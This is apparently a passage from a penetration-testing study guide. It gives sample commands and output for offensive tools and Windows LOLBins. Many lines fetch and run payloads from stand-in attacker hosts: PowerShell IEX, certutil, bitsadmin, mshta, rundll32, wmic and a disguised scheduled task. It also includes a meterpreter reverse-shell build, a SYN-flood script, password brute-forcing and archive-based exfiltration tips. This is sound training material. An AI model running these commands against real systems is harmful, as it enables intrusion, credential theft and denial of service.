wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc 404 http://10.80.176.154/FUZZ/Common flags: --hc 404: hide responses with Http status code 404 --hw 0: hide responses with 0 words --hs "Invalid": hide responses with "Invalid" -H "Host: FUZZ.target.com": fuzz for virtual hostswfuzz -c -z file,/usr/share/wordlists/usernames.txt -z file,/usr/share/wordlists/passwords.txt -d "username=FUZZ&password=FUZ2Z" --hc 302 http://target.com/login.php-d: post data for login form brute-forcing -
Output Example:
******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://smol.thm/FUZZ/ Total requests: 220560 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== [...] 000000241: 200 0 L 0 W 0 Ch "wp-content" 000000011: 301 0 L 0 W 0 Ch "# Priority ordered case-sensitive list, where entries were found" 000000786: 200 283 L 2888 W 59671 Ch "wp-includes" 000007180: 302 0 L 0 W 0 Ch "wp-admin" [...] Total time: 386.0505 Processed Requests: 220560 Filtered Requests: 220540 Requests/sec.: 571.3241
24. WPScan
-
Use Case: WordPress enumeration & vuln checks. Github
-
Input Example:
wpscan --updatewpscan --url http://wpscan.thm --enumerate twpscan --url http://wpscan.thm --enumerate pwpscan --url http://wpscan.thm/wp-login.php -P /usr/share/wordlists/rockyou.txt -U phreakazoidEnumeration Process: Available Choices: vp Vulnerable plugins ap All plugins p Popular plugins vt Vulnerable themes at All themes t Popular themes tt Timthumbs cb Config backups dbe Db exports u User IDs range. e.g: u1-5 Range separator to use: '-' Value if no argument supplied: 1-10 m Media IDs range. e.g m1-15 Note: Permalink setting must be set to "Plain" for those to be detected Range separator to use: '-' Value if no argument supplied: 1-100 Separator to use between the values: ',' Default: All Plugins, Config Backups Value if no argument supplied: vp,vt,tt,cb,dbe,u,m Incompatible choices (only one of each group/s can be used): - vp, ap, p - vt, at, t -
Output Example:
[+] URL: http://wpscan.thm/ [10.10.196.194] [+] Started: Sun Nov 9 13:36:06 2025 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [...] [+] WordPress readme found: http://wpscan.thm/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [...] [i] Theme(s) Identified: [+] twentynineteen | Location: http://wpscan.thm/wp-content/themes/twentynineteen/ | Last Updated: 2025-04-15T00:00:00.000Z | Readme: http://wpscan.thm/wp-content/themes/twentynineteen/readme.txt | [!] The version is out of date, the latest version is 3.1[...] [+] Enumerating Most Popular Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] nextcellent-gallery-nextgen-legacy | Location: http://wpscan.thm/wp-content/plugins/nextcellent-gallery-nextgen-legacy/ | Latest Version: 1.9.35 (up to date) | Last Updated: 2017-10-16T09:19:00.000Z | | Found By: Comment (Passive Detection) | | Version: 3.5.0 (60% confidence) | Found By: Comment (Passive Detection) | - http://wpscan.thm/, Match: '<meta name="NextGEN" version="3.5.0"' [...][...] [+] Performing password attack on Wp Login against 1 user/s [SUCCESS] - phreakazoid / linkinpark Trying phreakazoid / marlon Time: 00:00:06 < > (505 / 14344896) 0.00% ETA: ??:??:?? [!] Valid Combinations Found: | Username: phreakazoid, Password: linkinpark [...]
25. Pacu
-
Use Case: AWS exploitation framework (IAM, S3, EC2 attacks).
-
Input Example:
pacu run iam__enum_permissions run s3__bucket_finder -
Output Example:
PrivEsc path found via inline policy... Public S3 bucket: acme-logs
26. Docker Bench
-
Use Case: Docker host/container security baseline checks.
-
Input Example:
docker run --net host --pid host --userns host --cap-add audit_control \ -e DOCKER_CONTENT_TRUST=1 --label docker_bench_security \ -v /etc:/etc:ro -v /usr/bin/docker-containerd:/usr/bin/docker-containerd:ro \ -v /var/lib:/var/lib:ro -v /var/run/docker.sock:/var/run/docker.sock:ro \ docker/docker-bench-security -
Output Example:
[WARN] 1.1 Ensure a separate partition for /var/lib/docker [PASS] 1.2 Ensure only trusted users can control Docker
27. Prowler
-
Use Case: AWS CIS benchmark & best‑practice auditing.
-
Input Example:
prowler -M csv,json -S -q -
Output Example:
PASS 1.2 Ensure multi-factor auth enabled for root account FAIL 2.1 S3 buckets should not allow public read access: acme-logs
28. ScoutSuite
-
Use Case: Multi‑cloud posture assessment (AWS/Azure/GCP).
-
Input Example:
scoutsuite aws --profile pentest -
Output Example:
Findings: 3 Critical (Public S3, Open SG 0.0.0.0/0, Unrotated keys)
29. WPAD
-
Use Case: Proxy auto‑discovery abuse for credential capture/traffic redir.
-
Input Example:
responder -I eth0 -wF -
Output Example:
WPAD rogue proxy auth attempt captured - NTLMv2 hash for ACME\jdoe
30. WiFi‑Pumpkin
-
Use Case: Evil twin AP/captive portal phishing.
-
Input Example:
Configure SSID clone → start rogue AP with portal template. -
Output Example:
Credential captured: [email protected] password=P@ss123!
31. Kismet
-
Use Case: Wireless discovery, packet capture, IDS features, detect hidden networks and rogue APs. Github
-
Input Example:
sudo kismet --source=wlan0mon:channel=44 -
Output Example: Images
INFO: Including sub-config file: /etc/kismet/kismet_httpd.conf INFO: Including sub-config file: /etc/kismet/kismet_memory.conf INFO: Including sub-config file: /etc/kismet/kismet_alerts.conf INFO: Including sub-config file: /etc/kismet/kismet_80211.conf INFO: Including sub-config file: /etc/kismet/kismet_logging.conf INFO: Including sub-config file: /etc/kismet/kismet_filter.conf INFO: Including sub-config file: /etc/kismet/kismet_uav.conf [...] KISMET - Point your browser to http://localhost:2501 (or the address of this system) for the KismINFO: Detected new 802.11 Wi-Fi device 1C:F2:9A:28:F1:3E INFO: Detected new 802.11 Wi-Fi access point EC:FC:2F:03:2C:A8 INFO: 802.11 Wi-Fi device EC:FC:2F:03:2C:A8 advertising SSID '[REDACTED]' INFO: Detected new 802.11 Wi-Fi device EC:B5:FA:16:DB:5A INFO: Detected new 802.11 Wi-Fi device A8:29:48:33:79:E9 [...] ALERT: BCASTDISCON IEEE80211 Access Point BSSID 70:3A:51:0B:72:3C broadcast deauthentication or disassociation of all clients; Either the AP is shutting down or this is indicative of a possible denial of service attack. INFO: Detected new 802.11 Wi-Fi device EE:76:BD:2F:30:13 INFO: Detected new 802.11 Wi-Fi device 4C:F5:DC:E4:35:D1 [...]
32. Social Engineering Toolkit (SET)
-
Use Case: Phishing pages, credential capture, payload delivery (with consent). Github
-
Input Example:
set# SET Command line. Options: 1) Social-Engineering Attacks 1) Spear-Phishing Attack Vectors 1) Perform a Mass Email Attack > Choose your payload, choice of 22 (e.g., Adobe PDF, Microsoft Word) > Choose what type of shell you want (e.g., reverse TCP, meterpreter) > Set IP of payload listener: <ENTER> for localhost > Set port to connect back on: <DEFAULT 443> > Rename the filename of the payload > Next, choose either: 1) E-mail Attack Single Email Address 1) Pre-Defined Template 2) One-Time Use Email Template > Enter the subject of the email > Choose HTML or plain text messsage type > Enter the body of the message > Set email recipient > Next, choose to send via !) Gmail account 2) Use your own server or open relay > Enter the FROM address > Enter the FROM name > Enter username for open relay: <BLANK> default > Enter the server we are using (e.g., smtp.myserver.com) > Enter port number for the SMTP server > Flag message as high priority Y/N > Set up a listener Y/N: Yes 2) E-mail Attack Mass Mailer 2) Create a FileFormat Payload 3) Create a Social-Engineering Template 99) Return to Main Menu 2) Website Attack Vectors 1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 1) Web Templates 2) Site Cloner > Enter IP address of site (where it will be hosted): <ENTER> for localhost > Enter the URL to clone (e.g., facebook.com) > Go to fake website to confirm it is live > Watch the visits roll in! 3) Custom Import 99) Return to the Webattack Menu 4) Tabnabbing Attack Method 5) Web Jacking Attack Method 6) Multi-Attack Web Method 7) HTA Attack Method 99) Return to the Main Menu 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) Third Party Modules 99) Return back to the main menu 2) Penetration Testing (Fast-Track) 3) Third party modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineering Toolkit -
Output Example:
Credential captured: [email protected] : Summer2025!
33. Gophish
-
Use Case: Web-based framework for Phishing campaigns with tracking & reporting. Git Repo
-
Input Example:
1. Sending Profiles (SMTP config) → New Profile 2. Landing Page → New Page + Capture Submitted data and passwords 3. Email Templates → New Template 4. Users & Groups (email recipients) → New Group 5. Campaigns → New Campaign → Launch Campaign (send to target group) → Track results (Emails sent, opened, and clicked) -
Output Example: Images
Emails Sent: 25 | Opened: 18 | Clicked: 5 | Submitted data: 2 (Option to replay the captured credentials to a URL)
34. Evilginx
-
Use Case: Reverse proxy phishing to capture session cookies (MFA‑bypass testing).
-
Input Example:
evilginx -p phishlets phishlets enable microsoft lures create microsoft -
Output Example:
Captured session cookie for user [email protected]
35. Browser Exploitation Framework (BeEF)
-
Use Case: Browser hook & client‑side attack delivery. Steal cookies, capture keystrokes, take screenshots and perform network reconnaissance
-
Input Example:
Serve hook.js → victim loads page → control via BeEF UI. -
Output Example:
New hooked browser: 10.10.10.44 (Chrome 118)
36. Scapy
-
Use Case: Packet crafting/fuzzing (L2–L7), protocol experiments. Github
-
Input Example:
# Use the scapy python module to send a SYN packet from scapy.all import * # Create IP layer ip_layer = IP() ip_layer.dst = "192.168.1.1" ip_layer.src = "192.168.1.100" # Create the TCP layer tcp_layer = TCP() tcp_layer.dport = 80 tcp_layer.sport = 12345 tcp_layer.flags = "S" # SYN flag # Combine the layers packet = ip_layer/tcp_layer # Send the packet send(packet) # Print packet details print(packet.show())# ARP scan from scapy.all import * # Define the target network target_network = '10.211.55.0/24' # Craft ARP request arp_request = ARP(pdst=target_network) broadcast = Ether(dst="ff:ff:ff:ff:ff:ff:") arp_request_broadcast = broadcast/arp_request # Send the request and collect answers answered_lists = srp(arp_request_broadcast, timeout=1, verbose=False)[0] # Parse the responses for sent, received in answered_list: print(f"IP: {received.psrc} - MAC: {received.hwsrc}")# SYN flood from scapy.all import * # Define the target target_ip = '10.211.55.5' target_port = 80 # Create a SYN packet syn_packet = IP(dst=target_ip)/TCP(dport=target_port, flags="S") # Send the SYN packets in a loop for i in range(1000): send(syn_packet, verbose=False) print("SYN flood attack completed.") -
Output Example:
. Sent 1 packets.
37. tcprelay
-
Use Case: iOS USB tunneling to expose services as TCP ports.
-
Input Example:
tcprelay.py -t 22:2222 -
Output Example:
Forwarding local 2222 -> remote 22
38. MobSF (Mobile Security Framework)
-
Use Case: Static/dynamic analysis of Android/iOS apps.
-
Input Example:
Upload APK → Static analysis. -
Output Example:
Hardcoded secrets detected Debuggable: True Exported Activities: com.example.MainActivity
39. Frida
-
Use Case: Dynamic instrumentation/hook mobile and desktop apps.
-
Input Example:
frida -U -f com.example.app -l bypass_ssl.js --no-pause -
Output Example:
[*] SSL pinning bypassed
40. Drozer
-
Use Case: Android app/IPC security testing.
-
Input Example:
drozer console connect run app.package.list -f example -
Output Example:
com.example.app
41. Android Debug Bridge (ADB)
-
Use Case: Device control, app install, shell access.
-
Input Example:
adb devices adb shell pm list packages | grep example -
Output Example:
List of devices attached emulator-5554 device package:com.example.app
42. Bluestrike
-
Use Case: Bluetooth assessment (enumeration/attacks) in some lab toolsets.
-
Input Example:
bluestrike --scan -
Output Example:
Device: 00:1A:7D:DA:71:13 Name: BT-Speaker Services: A2DP
43. Caldera (MITRE)
-
Use Case: Automated adversary emulation (ATT&CK‑mapped).
-
Input Example:
Run an operation using the web UI → select agents & abilities. -
Output Example:
Operation completed: 14 techniques executed (T1059, T1047, T1105...)
44. Infection Monkey
-
Use Case: Self‑propagating assessment of segmentation & controls.
-
Input Example:
Deploy monkey agent → set constraints → run. -
Output Example:
Lateral movement succeeded to 10.10.10.22 via SMB Blocked by firewall on 10.10.10.23
45. Atomic Red Team
-
Use Case: Small, testable ATT&CK “atoms” to validate detections.
-
Input Example:
Invoke-AtomicTest T1059 -ShowDetailsBrief Invoke-AtomicTest T1059 -PromptForInputArgs -
Output Example:
Executed: T1059.001 PowerShell Result: Completed with exit code 0
46. PowerView
-
Use Case: AD enumeration/attack‑path discovery. Github - Part of PowerSploit
-
Input Example:
Import-Module .\PowerView.ps1 Get-NetUser | Select-Object cn
Get-NetGroup -GroupName *admin*
Invoke-ShareFinder
Get-NetComputer -FullData | Select-Object name, operatingsystem
- Output Example:
cn -- Administrator Guest krbtgt Machine-1 Admin2 Machine-2 SQL Service POST{P0W3RV13W_FTW} sshd
Administrators Hyper-V Administrators Storage Replica Administrators Schema Admins Enterprise Admins Domain Admins Key Admins Enterprise Key Admins DnsAdmins
\\Domain-Controller.CONTROLLER.local\ADMIN$ - Remote Admin \\Domain-Controller.CONTROLLER.local\C$ - Default share \\Domain-Controller.CONTROLLER.local\IPC$ - Remote IPC \\Domain-Controller.CONTROLLER.local\NETLOGON - Logon server share \\Domain-Controller.CONTROLLER.local\Share - \\Domain-Controller.CONTROLLER.local\SYSVOL - Logon server share
name operatingsystem ---- --------------- DOMAIN-CONTROLL Windows Server 2019 Standard DESKTOP-2 Windows 10 Enterprise Evaluation DESKTOP-1 Windows 10 Enterprise Evaluation
47. PowerUpSQL
-
Use Case: Find SQL instances & privilege escalation opportunities. Git Repo / Cheat Sheet
-
Input Example:
Import-Module .\PowerUpSQL.ps1 Get-SQLInstanceLocal -Verbose
Invoke-SQLAudit -Verbose -Instance WPERSISTENCE\SQLEXPRESS
- Output Example:
ComputerName : WPERSISTENCE Instance : WPERSISTENCE\SQLEXPRESS ServiceDisplayName : SQL Server (SQLEXPRESS) ServiceName : MSSQL$SQLEXPRESS ServicePath : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS ServiceAccount : NT Service\MSSQL$SQLEXPRESS State : Running
ComputerName : WPERSISTENCE Instance : WPERSISTENCE\SQLEXPRESS Vulnerability : Excessive Privilege - Execute xp_dirtree Description : xp_dirtree is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default. Remediation : Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_dirtree to Public Severity : Medium IsVulnerable : Yes IsExploitable : Yes Exploited : No ExploitCmd : Crack the password hash offline or relay it to another system. Details : The public principal has EXECUTE privileges on the xp_dirtree procedure in the master database. Reference : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/ Author : Scott Sutherland (@_nullbind), NetSPI 2016
48. AD Search (RSAT cmdlets example)
-
Use Case: Query AD users/groups/computers to support auth & lateral-movement attacks.
-
Input Example:
Get-ADUser -Filter * -Properties PasswordNeverExpires | Where-Object {$_.PasswordNeverExpires -eq $true} | Select-Object Name, Enabled
- Output Example:
Name Enabled ---- ------- svc_build True legacy_admin True
🧪 Quick “Flags & Tuning” Tips (Exam‑useful)
- Hydra/Medusa: Add (threads) and adjust timeouts for reliability.
-t 4 - hashcat: Choose correct mode (e.g., NTLM,
-m 1000sha512crypt). Use rules-m 1800.-r - CME: Use for local accounts;
--local-auth/--sammodules for dumping.--lsa - Impacket: ,
getST.py,ticketer.py,wmiexec.pyare frequent wins.dcomexec.py - ZAP/WFuzz/Gobuster: Respect rate limits; ignore lengths/hide headers with /filters.
--hh - Prowler/ScoutSuite: Run with least privilege creds; export HTML/JSON for reporting.
- Pacu: Snapshot IAM before changes; cleanup to avoid resource drift.
- Kismet/WiFi-Pumpkin: Use proper adapters with monitor/injection support.
- Use Metasploit modules aligned with scope—avoid DoS exploits.
- sqlmap flags like --risk and --level control depth of testing.
- Burp Suite Intruder useful for fuzzing parameters.
Other tools
1. WinPEAS
- Use Case: Privilege escalation auditing scripts that enumerate misconfigurations, vulnerabilities, and exploitable paths on Windows systems. Git Repo
2. LinPEAS / LinEnum
- Use Case: Privilege escalation auditing scripts that enumerate misconfigurations, vulnerabilities, and exploitable paths on Linux systems. Git Repo
3. tar and zip
Tar and Zip are primarily used for:
- Bundling multiple files (e.g., exploits, scripts, binaries) into one archive for easy transfer.
- Compressing payloads to reduce size for faster upload/download.
- Evading detection by changing file signatures or using password-protected archives.
- Exfiltration of data from compromised systems in a single compressed archive.
Tar
Strengths:
- Native to Unix/Linux systems. - Preserves file permissions and directory structure (important for scripts and configs). - Works well with gzip or bzip2 for compression (.tar.gz, .tar.bz2). - Fast for large sets of files.
Weaknesses:
- No built-in encryption or password protection. - Less common on Windows (requires extra tools). - Larger archives compared to zip when not compressed.
- Input Example:
# Create an archive: tar -cvf tools.tar exploit.sh payload.exe # Output - 'a' means 'added' a exploit.sh a payload.exe
# List the contents without extracting tar -tf tools.tar
# Compress with gzip: tar -czvf tools.tar.gz exploit.sh payload.exe
# Extract: tar -xvf tools.tar.gz # Output - 'x' means 'extracted' x exploit.sh x payload.exe
zip
Strengths:
- Cross-platform (Windows, Linux, macOS). - Supports password protection (basic, not strong encryption). - Commonly accepted by email and file transfer systems. - Built-in on Windows (Compress-Archive in PowerShell).
Weaknesses:
- Password protection is weak (ZIP crypto can be cracked easily). - Does not preserve Unix permissions by default. - Slightly slower for very large archives compared to tar.
- Input Example:
# Create a zip archive: zip tools.zip exploit.sh payload.exe
# Password-protect: zip -e tools.zip exploit.sh payload.exe
# Extract: unzip tools.zip
✅ Offensive Security Use Cases
- Payload Delivery: Compress payloads before uploading to a target. - Data Exfiltration: Bundle stolen files into a single archive for quick transfer. - Evasion: Use archives to bypass simple file-type filters. - Staging: Package multiple scripts and binaries for deployment on compromised hosts.
🔐 Pro Tip for PT0-003
- Tar is often used in Linux privilege escalation scenarios (e.g., GTFOBins). - Zip archives with weak passwords can be cracked using tools like fcrackzip or John the Ripper.
4. LOLBins
PowerShell
-
Official use case: Task automation and configuration management framework for Windows (and now cross-platform via PowerShell Core).
-
LOLBin use case: In 2019, Red Canary published a threat detection report stating that PowerShell is the most used technique for malicious activities.
-
Input Example:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object System.Net.WebClient).DownloadString('http://attacker.example/payload.ps1')"
PS> $username = 't1_leonard.summers'; PS> $password = 'EZpass4ever'; PS> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; PS> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; PS> Enter-PSSession -Computername thmiis.za.tryhackme.com -Credential $credential [thmiis.za.tryhackme.com]: PS C:\Users\t1_leonard.summers\Documents> whoami za\t1_leonard.summers [thmiis.za.tryhackme.com]: PS C:\Users\t1_leonard.summers\Documents>
powershell — launches PowerShell. -NoP (-NoProfile) — does not load the user’s profile scripts, reducing noise and speeding startup. -NonI (-NonInteractive) — runs non‑interactively (no prompts). -W Hidden (-WindowStyle Hidden) — starts with the console window hidden (less visible to the user). -Exec Bypass — sets ExecutionPolicy to Bypass for this process only, allowing scripts to run regardless of the machine’s policy. -Command " ... " — tells PowerShell to run the following command string. IEX — alias for Invoke-Expression, which evaluates and executes the string you pass to it as code. (New-Object System.Net.WebClient).DownloadString('http://attacker.example/payload.ps1') — uses .NET’s WebClient to download the contents of the remote file and return it as a string. Putting it together: IEX(<downloaded string>) executes the downloaded script directly in memory (a “fileless” technique).
MSBuild
-
Official use case: Build .NET applications and libraries.
-
LOLBin use case: File Execution - Execute payloads hidden inside .NET project files. PowerlessShell
-
Input Example:
# Create a powershell payload msfvenom -p windows/meterpreter/reverse_winhttps LHOST=AttackBox_IP LPORT=4443 -f psh-reflection > liv0ff.ps1 # Convert with PowerlessShell to a payload compatible with the MSBuild tool python2 PowerLessShell.py -type powershell -source /tmp/liv0ff.ps1 -output liv0ff.csproj # Build it with msbuild c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\liv0ff.csproj
- Output Example:
Microsoft (R) Build Engine version 4.8.3761.0 [Microsoft .NET Framework, version 4.0.30319.42000] Copyright (C) Microsoft Corporation. All rights reserved. Build started 11/10/2025 3:42:47 PM.
Explorer
-
Official use case: File manager and system component for Windows.
-
LOLBin use case: File Execution - Execute other .exe files, a technique known as Indirect Command Execution.
-
Input Example:
explorer.exe /root,"C:\Windows\System32\calc.exe"
- Output Example: Calculator on the destkop.
WMIC
-
Official use case: Windows Management Instrumentation (WMIC) is a Windows command-line utility that manages Windows components.
-
LOLBin use case: File Execution - Execute binaries for evading defensive measures.
-
Input Example:
wmic /node:TARGETHOST process call create "powershell -NoP -Command IEX(New-Object Net.WebClient).DownloadString('http://attacker.example/payload.ps1')" wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe" wmic /node:TARGETHOST process get name,commandline wmic /node:TARGETHOST /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi
wmic.exe process call create calc
- Output Example:
Node - 10.10.74.154 ERROR: Description = The RPC server is unavailable.
Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 4008; ReturnValue = 0; };
CertUtil
-
Official use case: Retrieve certificate information. Microsoft Documentation
-
LOLBin use case: File Operations - Transfer and encode files unrelated to certification services.
-
Input Example:
certutil -urlcache -split -f "http://attacker.example/payload.exe" C:\Users\Public\payload.exe certutil -decode C:\Users\Public\encoded.b64 C:\Users\Public\decoded.exe certutil -encode C:\Users\Public\decoded.exe C:\Users\Public\encoded.b64
- Output Example:
Input Length = 52 Output Length = 38 CertUtil: -decode command completed successfully.
BITSAdmin
-
Official use case: Create, download or upload Background Intelligent Transfer Service (BITS) jobs and check their progress. Microsoft Documentation
-
LOLBin use case: File Operations - Download and execute a malicious payload in a compromised machine.
-
Input Example:
bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\Users\thm\Desktop\payload.exe
- Output Example:
DISPLAY: '/Download' TYPE: DOWNLOAD STATE: TRANSFERRED PRIORITY: FOREGROUND FILES: 1 / 1 BYTES: 73802 / 73802 (100%) Transfer complete.
FindStr
-
Official use case: Find text and string patterns in files. Microsoft Documentation
-
LOLBin use case: File Operations - Download remote files from SMB shared folders within the network.
-
Input Example:
findstr /V dummystring \\MachineName\ShareFolder\test.exe > c:\Windows\Temp\test.exe
MSHTA
- Input Example:
mshta "http://attacker.example/payload.hta" mshta "javascript:var s=new ActiveXObject('WScript.Shell');s.Run('powershell -NoP -NonI -W Hidden -Command "Start-Process calc.exe"');close();" mshta "C:\Users\Public\malicious.hta"
rundll32
-
Official use case: Rundll32 is a Microsoft built-in tool that loads and runs Dynamic Link Library DLL files within the operating system.
-
LOLBin use case: File Execution - Run arbitrary payloads and execute JavaScript and PowerShell scripts.
-
Input Example:
# Start a payload, no visible output rundll32.exe C:\Winodws\Temp\payload.dll,Start
# Open a url hosted on the attacker machine, using the system's default protocol handler. rundll32.exe url.dll,FileProtocolHandler "http://attacker.example/update.html"
# Run calculator using javascript rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
# Download a powershell script into memory rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://AttackBox_IP/script.ps1');");
- Output Example:
Calculator on the desktop.
Powershell command window flashes up and immediately closes once the script has been downloaded.
Regsvr32
-
Official use case: Regsvr32 is a Microsoft command-line tool to register and unregister Dynamic Link Libraries (DLLs) in the Windows Registry.
-
LOLBin use case: Bypassing Application Whitelisting - Execute arbitrary binaries and bypass the Windows Application Whitelisting.
-
Input Example:
regsvr32.exe c:\Users\thm\Downloads\live0fftheland.dll
regsvr32.exe /s /n /u /i:http://example.com/file.sct Downloads\live0fftheland.dll
/s: in silent mode (without showing messages) /n: to not call the DLL register server /i:: to use another server since we used /n /u: to run with unregister method
- Output Example: If live0fftheland.dll is a meterpreter payload, then you can catch the meterpreter shell from the attacker box.
Bash
-
Official use case: As part of WSL, bash.exe is a Microsoft tool for interacting with the Linux environment
-
LOLBin use case: Bypassing Application Whitelisting - Execute payloads and bypass the Windows application whitelisting since it is a Microsoft signed binary. This technique is known as Indirect Command execution.
-
Input Example:
bash.exe -c "path-to-payload"
- Output Example: Requires the Linux subsystem enabled.
Scheduled tasks (schtasks / Task Scheduler)
- Input Example:
schtasks /Create /SC ONLOGON /TN "WindowsUpdate" /TR "powershell -NoP -NonI -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.example/ps1')\"" schtasks /Create /SC DAILY /TN "DailyJob" /TR "C:\Users\Public\encrypt.ps1" /ST 00:05 schtasks /Run /TN "WindowsUpdate"
5. pyinstaller
# Creates binary 'script.exe' pyinstaller --onefile script.py
244 INFO: PyInstaller: 6.16.0, contrib hooks: 2025.9 244 INFO: Python: 3.8.10 260 INFO: Platform: Linux-5.15.0-124-generic-x86_64-with-glibc2.29 260 INFO: Python environment: /usr 261 INFO: wrote /root/script.spec [...] 8524 INFO: Build complete! The results are available in: /root/dist
6. ps2exe
# Convert PS1 to EXE (binary) ps2exe .\script.ps1 .\script.exe
7. sc.exe
Ports:
- 135/TCP, 49152-65535/TCP (DCE/RPC)
- 445/TCP (RPC over SMB Named Pipes)
- 139/TCP (RPC over SMB Named Pipes)
💡Required Group Memberships: Administrators
# Create a remote service sc.exe \\thmiis.za.tryhackme.com create WEVAservice-0001 binPath= "%windir%\wevaservice.exe" start= auto
[SC] CreateService SUCCESS
# Start a remote service sc.exe \\thmiis.za.tryhackme.com start WEVAservice-0001
SERVICE_NAME: WEVAservice-0001 TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 4976 FLAGS :
8. WinRM
Ports:
- 5985/TCP (WinRM HTTP) or
- 5986/TCP (WinRM HTTPS))
💡Required Group Memberships: Remote Management Users
winrs.exe -u:t1_leonard.summers -p:EZpass4ever -r:10.200.48.201 ipconfig
Examples: winrs -r:https://myserver.com command winrs -r:myserver.com -usessl command winrs -r:myserver command winrs -r:http://127.0.0.1 command winrs -r:http://169.51.2.101:80 -unencrypted command winrs -r:https://[::FFFF:129.144.52.38] command winrs -r:http://[1080:0:0:0:8:800:200C:417A]:80 command winrs -r:https://myserver.com -t:600 -u:administrator -p:$%fgh7 ipconfig winrs -r:myserver -env:PATH=^%PATH^%;c:\tools -env:TEMP=d:\temp config.cmd winrs -r:myserver netdom join myserver /domain:testdomain /userd:johns /passwordd:$%fgh789 winrs -r:myserver -ad -u:administrator -p:$%fgh7 dir \\anotherserver\share
Winrs error:The WinRM client cannot process the request. Default authentication may be used with an IP address under the followi ng conditions: the transport is HTTPS or the destination is in the TrustedHosts list, and explicit credentials are provided. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. For more informat ion on how to set TrustedHosts run the following command: winrm help config. za\tony.holland@THMJMP2 c:\tools>winrs.exe -u:t1_leonard.summers -p:EZpass4ever -r:thmiis.za.tryhackme.com ipconfig Windows IP Configuration Ethernet adapter Ethernet 3: Connection-specific DNS Suffix . : eu-west-1.compute.internal IPv4 Address. . . . . . . . . . . : 10.200.48.201 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.200.48.1
8. WMI
Ports:
- 135/TCP, 49152-65535/TCP (DCERPC)
- 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
💡Required Group Memberships: Administrators
# First create a credential $username = 'Administrator'; $password = 'Mypass123'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; # We then proceed to establish a WMI session using either of the following protocols: # DCOM: RPC over IP will be used for connecting to WMI. This protocol uses port 135/TCP and ports 49152-65535/TCP, just as explained when using sc.exe. # Wsman: WinRM will be used for connecting to WMI. This protocol uses ports 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS). # Create a DCOM session $Opt = New-CimSessionOption -Protocol DCOM $Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
# Spawn a process remotely $Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere"; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $Command } ProcessId ReturnValue PSComputerName --------- ----------- -------------- 2808 0 thmiis.za.tryhackme.com
# Create a service remotely Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{ Name = "THMService2"; DisplayName = "THMService2"; PathName = "net user munra2 Pass123 /add"; # Your payload ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process StartMode = "Manual" } ReturnValue PSComputerName ----------- -------------- 23 thmiis.za.tryhackme.com # Get a handle on the service and start it $Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'THMService2'" Invoke-CimMethod -InputObject $Service -MethodName StartService ReturnValue PSComputerName ----------- -------------- 0 thmiis.za.tryhackme.com
